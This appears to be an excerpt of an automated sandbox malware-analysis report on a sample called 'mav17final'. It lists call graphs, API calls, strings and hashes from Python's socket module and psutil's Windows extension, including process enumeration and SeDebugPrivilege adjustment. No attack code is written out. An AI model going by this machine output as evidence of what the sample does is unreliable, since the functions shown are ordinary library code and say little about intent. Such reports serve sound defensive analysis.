7ff8b9f679d5 PyErr_SetFromWindowsErr 25098->25105 25141 7ff8b9f62600 13 API calls 25099->25141 25145 7ff8b9f6d0a8 21 API calls 25100->25145 25101->25107 25103 7ff8b9f62c46 25142 7ff8b9f65930 8 API calls 2 library calls 25103->25142 25105->25107 25107->25103 25109 7ff8b9f62c36 _Py_Dealloc 25107->25109 25108 7ff8b9f62c55 25108->25060 25109->25107 25110->25095 25111->25088 25116 7ff8b9f63bf0 25111->25116 25113->25051 25114->25071 25115->25055 25117 7ff8b9f63c3f ffi_prep_cif 25116->25117 25139 7ff8b9f63d03 25116->25139 25118 7ff8b9f63c62 25117->25118 25117->25139 25121 7ff8b9f63c7a 25118->25121 25122 7ff8b9f63d41 PyEval_SaveThread 25118->25122 25118->25139 25119 7ff8b9f68731 PyErr_SetString 25119->25139 25123 7ff8b9f6876b _errno _errno 25121->25123 25124 7ff8b9f68796 GetLastError SetLastError 25121->25124 25125 7ff8b9f63ca4 ffi_call 25121->25125 25122->25121 25123->25124 25127 7ff8b9f687c1 GetLastError SetLastError 25124->25127 25126 7ff8b9f63ce9 25125->25126 25126->25127 25128 7ff8b9f687db _errno _errno 25126->25128 25129 7ff8b9f63d4f PyEval_RestoreThread 25126->25129 25126->25139 25127->25128 25128->25139 25129->25139 25130 7ff8b9f687ff _Py_Dealloc 25130->25139 25131 7ff8b9f6880e PySys_Audit 25131->25139 25132 7ff8b9f63d15 25133 7ff8b9f63d19 PyErr_Occurred 25132->25133 25134 7ff8b9f63d24 25132->25134 25133->25134 25134->25088 25135 7ff8b9f6873c PyErr_SetFromWindowsErr 25135->25139 25136 7ff8b9f688c6 25137 7ff8b9f688a2 PyErr_Format 25137->25139 25138 7ff8b9f68890 PyErr_Format 25138->25139 25139->25119 25139->25123 25139->25130 25139->25131 25139->25132 25139->25135 25139->25136 25139->25137 25139->25138 25146 7ff8b9f6d5f8 12 API calls 25139->25146 25140->25085 25141->25107 25142->25108 25143->25107 25144->25095 25145->25107 25146->25139 25147 7ff8b9074b90 25148 7ff8b9074ba6 fprintf 25147->25148 25149 7ff8b9074cf1 NtQuerySystemInformation 25148->25149 25152 7ff8b9074bae 25148->25152 25150 7ff8b9074d0d 25149->25150 25149->25152 25153 7ff8b9071300 9 API calls 25150->25153 25153->25152 25154 7ff8b9074610 25155 7ff8b9074641 25154->25155 25164 7ff8b9074729 25155->25164 25165 7ff8b9071380 25155->25165 25157 7ff8b9074783 25159 7ff8b9074676 25160 7ff8b9074690 RtlGetVersion 25159->25160 25159->25164 25161 7ff8b90746a4 GetSystemInfo InitializeCriticalSection 25160->25161 25220 7ff8b90782e0 GetCurrentProcess OpenProcessToken 25161->25220 25251 7ff8b9079fe0 8 API calls 2 library calls 25164->25251 25166 7ff8b9071390 LoadLibraryA 25165->25166 25167 7ff8b90713ac 25166->25167 25168 7ff8b90713c2 GetProcAddress 25167->25168 25177 7ff8b90713b1 25167->25177 25169 7ff8b9071408 GetModuleHandleA 25168->25169 25170 7ff8b90713d7 FreeLibrary 25168->25170 25171 7ff8b907142a GetProcAddress 25169->25171 25172 7ff8b9071421 25169->25172 25170->25177 25171->25172 25173 7ff8b9071467 GetModuleHandleA 25171->25173 25172->25159 25175 7ff8b9071489 GetProcAddress 25173->25175 25176 7ff8b9071480 25173->25176 25175->25176 25178 7ff8b90714c6 LoadLibraryA 25175->25178 25176->25159 25177->25159 25180 7ff8b90714ef 25178->25180 25181 7ff8b907151a GetProcAddress 25180->25181 25182 7ff8b90714f4 25180->25182 25183 7ff8b907152f FreeLibrary 25181->25183 25184 7ff8b9071560 25181->25184 25182->25159 25183->25159 25252 7ff8b9071270 25184->25252 25188 7ff8b9071270 3 API calls 25189 7ff8b907159d 25188->25189 25189->25177 25190 7ff8b9071270 3 API calls 25189->25190 25191 7ff8b90715c0 25190->25191 25191->25177 25192 7ff8b9071270 3 API calls 25191->25192 25193 7ff8b90715e3 25192->25193 25193->25177 25194 7ff8b9071270 3 API calls 25193->25194 25195 7ff8b9071606 25194->25195 25195->25177 25196 7ff8b9071270 3 API calls 25195->25196 25197 7ff8b9071629 25196->25197 25197->25177 25198 7ff8b9071270 3 API calls 25197->25198 25199 7ff8b907164c 25198->25199 25199->25177 25200 7ff8b9071270 3 API calls 25199->25200 25201 7ff8b907166f 25200->25201 25201->25177 25202 7ff8b907167f GetModuleHandleA 25201->25202 25203 7ff8b907169a GetProcAddress 25202->25203 25204 7ff8b9071691 25202->25204 25203->25204 25205 7ff8b90716d7 25203->25205 25204->25159 25206 7ff8b9071270 3 API calls 25205->25206 25207 7ff8b90716f1 25206->25207 25207->25177 25208 7ff8b9071701 GetModuleHandleA 25207->25208 25209 7ff8b907171c GetProcAddress 25208->25209 25210 7ff8b9071713 25208->25210 25209->25210 25211 7ff8b9071731 25209->25211 25212 7ff8b9071270 3 API calls 25210->25212 25211->25210 25213 7ff8b907175c 25212->25213 25214 7ff8b9071270 3 API calls 25213->25214 25215 7ff8b9071776 25214->25215 25216 7ff8b9071270 3 API calls 25215->25216 25217 7ff8b9071790 25216->25217 25218 7ff8b9071270 3 API calls 25217->25218 25219 7ff8b90717aa 25218->25219 25219->25159 25221 7ff8b90783cd 25220->25221 25222 7ff8b9078339 GetLastError 25220->25222 25225 7ff8b90783d7 25221->25225 25226 7ff8b90783e1 LookupPrivilegeValueA 25221->25226 25223 7ff8b9078396 GetLastError 25222->25223 25224 7ff8b9078346 ImpersonateSelf 25222->25224 25236 7ff8b90783b6 25223->25236 25229 7ff8b9078369 OpenProcessToken 25224->25229 25230 7ff8b9078353 25224->25230 25231 7ff8b9078240 GetLastError 25225->25231 25227 7ff8b9078433 AdjustTokenPrivileges 25226->25227 25228 7ff8b9078401 GetLastError 25226->25228 25234 7ff8b90784aa AdjustTokenPrivileges 25227->25234 25235 7ff8b9078477 GetLastError 25227->25235 25246 7ff8b9078421 25228->25246 25229->25221 25233 7ff8b9078380 25229->25233 25263 7ff8b9071070 9 API calls 25230->25263 25232 7ff8b9078364 25231->25232 25266 7ff8b9079fe0 8 API calls 2 library calls 25232->25266 25264 7ff8b9071070 9 API calls 25233->25264 25240 7ff8b90784f5 RevertToSelf FindCloseChangeNotification 25234->25240 25241 7ff8b90784e4 25234->25241 25235->25246 25249 7ff8b9078240 GetLastError 25236->25249 25239 7ff8b907835f 25244 7ff8b9078240 GetLastError 25239->25244 25240->25232 25265 7ff8b9071070 9 API calls 25241->25265 25242 7ff8b907838c 25247 7ff8b9078240 GetLastError 25242->25247 25244->25232 25259 7ff8b9078240 25246->25259 25247->25232 25248 7ff8b9078515 25248->25164 25249->25232 25251->25157 25253 7ff8b9071290 LoadLibraryA 25252->25253 25254 7ff8b90712a8 25253->25254 25255 7ff8b90712ad 25254->25255 25256 7ff8b90712ba GetProcAddress 25254->25256 25255->25177 25255->25188 25256->25255 25257 7ff8b90712cb FreeLibrary 25256->25257 25257->25255 25260 7ff8b90782a8 GetLastError 25259->25260 25262 7ff8b907824d fprintf 25259->25262 25261 7ff8b90782b3 25260->25261 25262->25260 25263->25239 25264->25242 25265->25246 25266->25248 25267 7ff8b9071980 25268 7ff8b907198e 25267->25268 25269 7ff8b9071996 25268->25269 25272 7ff8b9077cd0 25268->25272 25273 7ff8b9077cf0 25272->25273 25274 7ff8b9077d1b K32EnumProcesses 25273->25274 25275 7ff8b90719ba 25273->25275 25274->25273 25274->25275 25276 7ff8b9074ac0 GetSystemTimes 25277 7ff8b9074add 25276->25277 25278 7ff8b9072370 25279 7ff8b9072399 25278->25279 25280 7ff8b90725a7 25279->25280 25281 7ff8b90723a8 25279->25281 25282 7ff8b90723c4 GetProcessHeap HeapAlloc 25279->25282 25305 7ff8b9071180 8 API calls 25281->25305 25282->25280 25284 7ff8b90723e7 NtQuerySystemInformation 25282->25284 25286 7ff8b90724ec 25284->25286 25287 7ff8b9072420 25284->25287 25285 7ff8b90723b4 25288 7ff8b907254f GetProcessHeap HeapFree 25286->25288 25289 7ff8b90724f0 GetProcessHeap HeapFree 25286->25289 25290 7ff8b9072427 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 25287->25290 25291 7ff8b9072493 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 25287->25291 25306 7ff8b90781c0 21 API calls 25289->25306 25290->25280 25292 7ff8b9072460 NtQuerySystemInformation 25290->25292 25291->25280 25293 7ff8b90724cf NtQuerySystemInformation 25291->25293 25292->25286 25295 7ff8b9072489 25292->25295 25293->25286 25295->25290 25297 7ff8b9072491 25295->25297 25296 7ff8b907250d 25299 7ff8b907252f 25296->25299 25300 7ff8b9072511 25296->25300 25297->25289 25308 7ff8b9071300 9 API calls 25299->25308 25307 7ff8b90710e0 8 API calls 25300->25307 25303 7ff8b907251d 25304 7ff8b907253d 25305->25285 25306->25296 25307->25303 25308->25304 25309 7ff8b9071e60 25310 7ff8b9071e7f 25309->25310 25311 7ff8b9071ec8 25310->25311 25312 7ff8b9071e8b 25310->25312 25313 7ff8b9071e99 OpenProcess 25310->25313 25363 7ff8b9071180 8 API calls 25312->25363 25315 7ff8b9071ed5 25313->25315 25316 7ff8b9071eb1 GetLastError 25313->25316 25330 7ff8b9077ed0 25315->25330 25316->25315 25319 7ff8b9071ebc 25316->25319 25318 7ff8b9071e97 25318->25311 25321 7ff8b9071eed GetProcessTimes 25318->25321 25364 7ff8b9071070 9 API calls 25319->25364 25322 7ff8b9071f5e FindCloseChangeNotification 25321->25322 25323 7ff8b9071f13 GetLastError 25321->25323 25326 7ff8b9071f88 25322->25326 25324 7ff8b9071f1e 25323->25324 25325 7ff8b9071f40 CloseHandle 25323->25325 25365 7ff8b90710e0 8 API calls 25324->25365 25328 7ff8b9071f2a CloseHandle 25331 7ff8b9077ee8 GetLastError 25330->25331 25332 7ff8b9078037 25330->25332 25335 7ff8b9077f0c GetLastError 25331->25335 25336 7ff8b9077ef3 25331->25336 25333 7ff8b9078104 25332->25333 25334 7ff8b9078040 GetExitCodeProcess 25332->25334 25333->25318 25339 7ff8b907808f GetLastError 25334->25339 25340 7ff8b907804f 25334->25340 25337 7ff8b907801e 25335->25337 25338 7ff8b9077f1a 25335->25338 25370 7ff8b90710e0 8 API calls 25336->25370 25373 7ff8b9071070 9 API calls 25337->25373 25343 7ff8b9077d80 K32EnumProcesses 25338->25343 25342 7ff8b9078112 25339->25342 25361 7ff8b907809a fprintf 25339->25361 25340->25333 25366 7ff8b9077d80 25340->25366 25375 7ff8b9071070 9 API calls 25342->25375 25348 7ff8b9077f21 25343->25348 25345 7ff8b9077eff 25345->25318 25347 7ff8b90780fc SetLastError 25347->25333 25360 7ff8b9077fa1 fprintf 25348->25360 25362 7ff8b9077f26 fprintf 25348->25362 25349 7ff8b907802a 25349->25318 25351 7ff8b907811e CloseHandle 25351->25318 25352 7ff8b9078064 25352->25333 25353 7ff8b907806d CloseHandle 25352->25353 25374 7ff8b90710e0 8 API calls 25353->25374 25357 7ff8b9077f94 25357->25318 25358 7ff8b9078011 25358->25318 25359 7ff8b9078082 25359->25318 25372 7ff8b90710e0 8 API calls 25360->25372 25361->25347 25371 7ff8b9071180 8 API calls 25362->25371 25363->25318 25364->25311 25365->25328 25367 7ff8b9077da0 25366->25367 25368 7ff8b9077dcb K32EnumProcesses 25367->25368 25369 7ff8b9077def fprintf 25367->25369 25368->25367 25368->25369 25369->25352 25370->25345 25371->25357 25372->25358 25373->25349 25374->25359 25375->25351 25376 7ff8b9077a20 25377 7ff8b9077a43 25376->25377 25379 7ff8b9077a67 25377->25379 25380 7ff8b9077910 25377->25380 25381 7ff8b907793f 25380->25381 25382 7ff8b9077950 NtQuerySystemInformation 25381->25382 25383 7ff8b90779af 25381->25383 25386 7ff8b9077991 25381->25386 25382->25381 25384 7ff8b90779b3 25383->25384 25387 7ff8b90779cc 25383->25387 25389 7ff8b9071300 9 API calls 25384->25389 25386->25379 25387->25386 25390 7ff8b90710e0 8 API calls 25387->25390 25389->25386 25390->25386

                                                  Executed Functions

                                                  Function 00007FF8B93C1060 Relevance: 632.7, APIs: 189, Strings: 172, Instructions: 923networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 7ff8b93c1060-7ff8b93c10aa WSAStartup 1 7ff8b93c10b0-7ff8b93c10cb Py_AtExit 0->1 2 7ff8b93c3108-7ff8b93c3110 0->2 5 7ff8b93c10d1-7ff8b93c1153 call 7ff8b93c2f5c VerSetConditionMask * 3 VerifyVersionInfoW 1->5 6 7ff8b93c1159-7ff8b93c117f PyModule_Create2 1->6 3 7ff8b93c3112-7ff8b93c3115 2->3 4 7ff8b93c3145 2->4 9 7ff8b93c3117-7ff8b93c311a 3->9 10 7ff8b93c313c-7ff8b93c3143 3->10 11 7ff8b93c314c-7ff8b93c315c PyErr_SetString 4->11 5->6 7 7ff8b93c1185-7ff8b93c11c9 PyModule_AddObject PyErr_NewException 6->7 8 7ff8b93c219e-7ff8b93c21a0 6->8 7->8 13 7ff8b93c11cf-7ff8b93c1209 PyModule_AddObject PyErr_NewException 7->13 14 7ff8b93c216e-7ff8b93c219d call 7ff8b93c2280 8->14 9->4 15 7ff8b93c311c-7ff8b93c3136 PyErr_Format 9->15 10->11 19 7ff8b93c3162-7ff8b93c316b PyErr_NoMemory 11->19 13->8 18 7ff8b93c120f-7ff8b93c1262 PyModule_AddObject PyModule_AddObjectRef PyModule_AddObject 13->18 15->10 18->8 21 7ff8b93c1268-7ff8b93c1284 PyModule_AddObject 18->21 19->8 22 7ff8b93c3171 19->22 21->8 23 7ff8b93c128a-7ff8b93c12b5 PyModule_AddObject PyMem_Malloc 21->23 24 7ff8b93c322a-7ff8b93c3234 _Py_Dealloc 22->24 23->19 25 7ff8b93c12bb-7ff8b93c1304 PyCapsule_New 23->25 24->8 26 7ff8b93c3176-7ff8b93c3181 call 7ff8b93c4b80 25->26 27 7ff8b93c130a-7ff8b93c131f PyModule_AddObject 25->27 26->8 35 7ff8b93c3187 26->35 28 7ff8b93c1325-7ff8b93c2034 PyModule_AddIntConstant * 11 PyModule_AddStringConstant * 2 PyModule_AddIntConstant * 137 27->28 29 7ff8b93c318c-7ff8b93c318f 27->29 34 7ff8b93c2037-7ff8b93c2042 PyLong_FromUnsignedLong 28->34 32 7ff8b93c3191-7ff8b93c3194 _Py_Dealloc 29->32 33 7ff8b93c319a-7ff8b93c319d 29->33 32->33 33->8 36 7ff8b93c31a3 33->36 34->8 37 7ff8b93c2048-7ff8b93c2064 PyModule_AddObject 34->37 35->24 36->24 37->34 38 7ff8b93c2066-7ff8b93c20c7 PyModule_AddIntConstant * 4 PyModule_GetDict 37->38 39 7ff8b93c3220-7ff8b93c3224 38->39 40 7ff8b93c20cd-7ff8b93c2147 VerSetConditionMask * 3 38->40 39->8 39->24 41 7ff8b93c214a-7ff8b93c2165 VerifyVersionInfoA 40->41 42 7ff8b93c216b 41->42 43 7ff8b93c31a8-7ff8b93c31c6 PyUnicode_FromString 41->43 42->14 43->39 44 7ff8b93c31c8-7ff8b93c31e3 _PyDict_Pop 43->44 45 7ff8b93c31e5-7ff8b93c31e8 _Py_Dealloc 44->45 46 7ff8b93c31ee-7ff8b93c31f1 44->46 45->46 46->39 47 7ff8b93c31f3-7ff8b93c31f8 46->47 48 7ff8b93c3203-7ff8b93c3215 47->48 49 7ff8b93c31fa-7ff8b93c31fd _Py_Dealloc 47->49 48->41 50 7ff8b93c321b 48->50 49->48 50->39
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073080190.00007FF8B93C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF8B93C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2073053555.00007FF8B93C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073128104.00007FF8B93C8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073161336.00007FF8B93D0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073189700.00007FF8B93D2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b93c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Module_$Constant$Object$ConditionMask$Err_$ExceptionInfoStringVerifyVersion$Capsule_Create2DictExitFormatFromLongLong_MallocMem_StartupUnsigned
                                                  • String ID: 00:00:00:00:00:00$00:00:00:FF:FF:FF$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_DROP_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket$socket.gaierror$socket.herror$timeout
                                                  • API String ID: 2280847565-1299366327
                                                  • Opcode ID: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
                                                  • Instruction ID: 6025f09bfa47ceafd5facd5c340fee966936137d67e47c65ee503b26e6c68a26
                                                  • Opcode Fuzzy Hash: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
                                                  • Instruction Fuzzy Hash: 7BA2C668B18FA2A5EA14DF1AE8546662331BB4EBD1F847035CE0E06764DEBDE34DC701
                                                  Function 00007FF8B9074610 Relevance: 70.2, APIs: 3, Strings: 37, Instructions: 235COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CriticalInfoInitializeLibraryLoadSectionSystemVersion
                                                  • String ID: ABOVE_NORMAL_PRIORITY_CLASS$BELOW_NORMAL_PRIORITY_CLASS$ERROR_ACCESS_DENIED$ERROR_INVALID_NAME$ERROR_PRIVILEGE_NOT_HELD$ERROR_SERVICE_DOES_NOT_EXIST$HIGH_PRIORITY_CLASS$IDLE_PRIORITY_CLASS$INFINITE$MIB_TCP_STATE_CLOSED$MIB_TCP_STATE_CLOSE_WAIT$MIB_TCP_STATE_CLOSING$MIB_TCP_STATE_DELETE_TCB$MIB_TCP_STATE_ESTAB$MIB_TCP_STATE_FIN_WAIT1$MIB_TCP_STATE_FIN_WAIT2$MIB_TCP_STATE_LAST_ACK$MIB_TCP_STATE_LISTEN$MIB_TCP_STATE_SYN_RCVD$MIB_TCP_STATE_SYN_SENT$MIB_TCP_STATE_TIME_WAIT$NORMAL_PRIORITY_CLASS$PSUTIL_CONN_NONE$PSUTIL_DEBUG$REALTIME_PRIORITY_CLASS$TimeoutAbandoned$TimeoutExpired$WINDOWS_10$WINDOWS_7$WINDOWS_8$WINDOWS_8_1$WINDOWS_VISTA$WINVER$_psutil_windows.Error$_psutil_windows.TimeoutAbandoned$_psutil_windows.TimeoutExpired$version
                                                  • API String ID: 926842855-2468274236
                                                  • Opcode ID: 85c7b31a6a932c1691d0eca6bba646cd36cf514f1aeafebe573b9e429b05bbbf
                                                  • Instruction ID: 5ef306d15f9461d4da5b31bad7c47490940ba437eb94a25e01638c24ae866ddd
                                                  • Opcode Fuzzy Hash: 85c7b31a6a932c1691d0eca6bba646cd36cf514f1aeafebe573b9e429b05bbbf
                                                  • Instruction Fuzzy Hash: 4EC11F24B18A9691FF109F2DE9943782B62BF69BF5F808035CA0E46B60DF6CE147C701
                                                  Function 00007FF8B9072370 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 147memorynativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                  • String ID: NtQuerySystemInformation$automatically set for PID 0$psutil_pid_is_running -> 0
                                                  • API String ID: 722747020-1794217337
                                                  • Opcode ID: c7ae699ce2a892379fce2e4808c87eb30de3fe2b6b0b889759ce124942a3d854
                                                  • Instruction ID: 846819f1c4a1f83a1eefd82dfc350ed25948378e3eb59ccb5f160d14c19c56d0
                                                  • Opcode Fuzzy Hash: c7ae699ce2a892379fce2e4808c87eb30de3fe2b6b0b889759ce124942a3d854
                                                  • Instruction Fuzzy Hash: BF512021E08AC682EF509F6AF45417E6BA1FFA8BE4F444135DB4D43B58EE3CE5468740
                                                  Function 00007FF8B90782E0 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 128COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Processfprintf$OpenToken$CurrentImpersonateSelf
                                                  • String ID: (originated from %s)$AdjustTokenPrivileges$ImpersonateSelf$LookupPrivilegeValue$OpenProcessToken$SeDebugPrivilege
                                                  • API String ID: 2304922976-3705996988
                                                  • Opcode ID: 05f1a684b56bb86ca3b888b6c1abfd21607b48faccc12cb3d56ba191f6d314fb
                                                  • Instruction ID: 05711faed1e9925cf3523d6e83c1e4378f624f9d8b503aed5f42c51e1ebb3b0e
                                                  • Opcode Fuzzy Hash: 05f1a684b56bb86ca3b888b6c1abfd21607b48faccc12cb3d56ba191f6d314fb
                                                  • Instruction Fuzzy Hash: F7513E31A0CAC681EF509F39E8842A96B64FF647E4F504036DB4E42669DF7CE54BC750
                                                  Function 00007FF8B9074B90 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 182COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ddddd)$GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$NtQuerySystemInformation(SystemProcessorPerformanceInformation)$psutil-debug [%s:%d]> $psutil/arch/windows/cpu.c
                                                  • API String ID: 0-2108063674
                                                  • Opcode ID: 2ca73cd30470c9455e3ec07614443548941fff10896586bf88e3bee20af541bc
                                                  • Instruction ID: badb678b66f7d657e960367a5342d406e497ae6a79d7230354cafeec74058ef3
                                                  • Opcode Fuzzy Hash: 2ca73cd30470c9455e3ec07614443548941fff10896586bf88e3bee20af541bc
                                                  • Instruction Fuzzy Hash: A6719831A19A8186EE569F3DA854275B7A6AF65BD0F048331DB0F62750EF3CE4878710
                                                  Function 00007FF8B9077910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystem
